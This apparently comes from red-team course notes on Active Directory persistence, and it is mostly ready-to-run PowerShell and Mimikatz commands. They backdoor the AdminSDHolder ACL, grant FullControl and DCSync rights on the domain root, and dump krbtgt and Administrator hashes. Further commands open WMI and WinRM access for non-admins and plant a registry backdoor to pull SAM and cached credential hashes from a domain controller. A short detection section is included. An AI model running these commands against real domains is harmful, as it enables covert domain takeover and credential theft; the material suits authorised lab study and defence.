Professional Documents
Culture Documents
Persistence ACLs
Persistence ACLs
Persistence ACLs
AdminSDHolder
Admin Security Descriptor Holder
AdminSDHolder is a container object in Active Directory that stores the security descriptor
template for protected groups and their members. These groups have elevated privileges
and require extra security measures. The AdminSDHolder object's ACL is automatically
applied to all protected groups and their members, ensuring consistent permissions and
preventing unauthorized access.
Resides in the System container of a domain and used to control the permissions - using an
ACL - for certain built-in privileged groups (called Protected Groups).
Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of
protected groups and members with the ACL of AdminSDHolder and any differences are
overwritten on the object ACL.
1/11
ACLs and ACEs in any protected group
Administrators group
2/11
Backup Operators Group
3/11
4/11
Abuse
• Add FullControl permissions for a user to the AdminSDHolder using PowerView as Domain
Admin
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -
PrincipalSamAccountName <username> -Rights All -Verbose
Add-DomainObjectAcl -TargetIdentity
'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -
PrincipalIdentity student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -
TargetDomain dollarcorp.moneycorp.local -Verbose
Add-DomainObjectAcl -TargetIdentity
'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -
PrincipalIdentity student1 -Rights WriteMembers -PrincipalDomain
dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
5/11
Domain Admin
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -
PrincipalSamAccountName <username> -Rights WriteMembers -Verbose
• Check the Domain Admins permission using ActiveDirectory Module as normal user
(Get-Acl -Path 'AD:\CN=Domain
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?
{$_.IdentityReference -match '<username>'}
• Abuse FullControl by adding a user to the Domain Admins group using PowerView_dev
Add-DomainGroupMember -Identity 'Domain Admins' -Members <username> -Verbose
Add-ADGroupMember -Identity 'Domain Admins' -Members <username>
• Abuse FullControl by adding a user to the Domain Admins group using ActiveDirectory
Module
Add-ADGroupMember -Identity 'Domain Admins' -Members <username>
6/11
Rights Abuse (Persistence using ACLs)
With Domain Admin privileges, the ACL for the domain root can be modified to provide
useful rights like FullControl or the ability to run DCSync.
• Add FullControl permissions for a user to the ACL of the domain root using PowerView as
Domain Admin
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -
PrincipalSamAccountName <username> -Rights All -Verbose
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -
PrincipalIdentity student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -
TargetDomain dollarcorp.moneycorp.local -Verbose
• Add FullControl permissions for a user to the ACL of the domain root using
ActiveDirectory Module and Set-ADACL as Domain Admin
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal
<username> -Verbose
Set-ADACL -SamAccountName studentuser1 -DistinguishedName
'DC=dollarcorp,DC=moneycorp,DC=local' -Right GenericAll -Verbose
• Add DCSync rights for a user to the ACL of the domain root using PowerView as Domain
Admin
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -
PrincipalSamAccountName <username> -Rights DCSync -Verbose
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -
PrincipalIdentity student1 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -
TargetDomain dollarcorp.moneycorp.local -Verbose
# 3 permissions: Replicating Directory Changes, Replicating Directory Changes All,
Replicating Directory Changes In Filtered Set
• Add DCSync rights for a user to the ACL of the domain root using ActiveDirectory Module
and Set-ADACL as Domain Admin
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal
<username> -GUIDRight DCSync -Verbose
# 3 permissions: Replicating Directory Changes, Replicating Directory
Changes All, Replicating Directory Changes In Filtered Set
• Execute DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<Domain>\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<Domain>\Administrator"' # Can
be used for any user
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
Conclusion:
AdminSDHolder is a sneaky method for an attacker to persist granting the ability to modify
the most privileged groups in Active Directory by leveraging a key security component.
Even if the permissions are changed on a protected group or user, SDProp will change the
securtiy permissions to match that of the AdminSDHolder object.
Detection:
Monitor the ACLs configured on the AdminSDHolder object. These should be kept at the
default – it is not usually necessary to add other groups to the AdminSDHolder ACL.
Monitor users and groups with AdminCount = 1 to identify accounts with ACLs set by
SDProp.
Find all users with security ACLs set by SDProp using the PowerShell AD cmdlets:
Import-Module ActiveDirectory
Get-ADObject -LDAPFilter "(&(admincount=1)(|(objectcategory=person)
(objectcategory=group)))" -Properties MemberOf,Created,Modified,AdminCount
Resources
https://adsecurity.org/?p=1906
https://blog.harmj0y.net/redteaming/abusing-active-directory-permissions-with-
powerview/
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/
how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence
https://github.com/jwardsmith/Active-Directory-Exploitation#rights-abuse-persistence-
using-acls
8/11
Security Descriptors
Security Descriptors
Security Descriptor Definition Language (SDDL) defines the format which is used to describe
a security descriptor. SDDL uses ACE strings for DACL and SACL
ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
EX: A;CI;CCDCLCSWRPWPRCWD;;;SID
The security descriptors are used to store the permissions an object has over an object.
If you can just make a little change in the security descriptor of an object, you can obtain
very interesting privileges over that object without needing to be member of a privileged
group.
https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-
definition-language
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/security-
descriptors
what is DACLs, SACLs, ACEs ?
https://docs.netapp.com/us-en/ontap/smb-admin/security-descriptors-apply-file-folder-
security-concept.html
Abuse
→ Show the SDDL of a service
sc.exe sdshow <service>
• Enable our user the ability to execute WMI queries on a target machine e.g. Domain
Controller even without having Administrative privileges using the GUI as a Domain Admin.
Consists of two parts: must have the privileges to connect to the DCOM endpoint, and must
have the privileges to connect to the namespace
DCOM endpoint: Start Menu -> Component Service -> Computers -> My Computer ->
Properties -> COM Security Tab -> Access Permissions -> Edit Links -> Add our user -> Click
Allow for everything
Namespace: Start Menu -> Computer Management -> Services and Applications -> WMI
9/11
Control -> Properties -> Security Tab -> Root -> Security -> Add our user -> Click Allow for
everything -> Advanced -> Select our user -> Edit -> Applies to 'This namespace and
subnamespaces'
→ On remote machine with explicit credentials. Only root\cimv2 and nested namespaces
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential
Administrator –namespace 'root\cimv2' -Verbose # On remote machine with explicit
credentials. Only root\cimv2 and nested namespaces
Access To WinRM
• Enable our user the ability to execute PowerShell Remoting to a target machine e.g.
Domain Controller even without having Administrative privileges using PowerShell
commands (modify ACLs to allow non-admin users access to securable objects) as Domain
Admin
using RACE.ps1 and PS remoting ### it's not stable after August 2020 patches
• Access the registry and dump hashes creating a Reg backdoor using DAMP, so you can at
any moment retrieve the hash of the computer, the SAM and any cached AD credential in
the computer. So, it's very useful to give this permission to a regular user against a Domain
Controller computer
→ Using RACE or DAMP, with admin privs on remote machine To allows for the remote
retrieval of a system's machine and local account hashes, as well as its domain cached
credentials.
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose
→ As student1, retrieve machine account hash by Abuses the ACL backdoor set by Add-
RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified
machine.
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
→ Retrieve local account hash by Abuses the ACL backdoor set by Add-
RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified
machine.
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
→ Retrieve domain cached credentials by Abuses the ACL backdoor set by Add-
RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified
machine.
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose
Resources
https://github.com/jwardsmith/Active-Directory-Exploitation#rights-abuse-persistence-
using-acls
v
11/11